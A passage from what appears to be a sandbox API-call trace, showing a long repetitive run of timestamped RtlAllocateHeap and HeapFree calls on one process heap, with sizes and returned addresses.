Size=0xb0) returned 0x3b77c48 [0206.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0206.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0206.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.415] RtlAllocateHeap 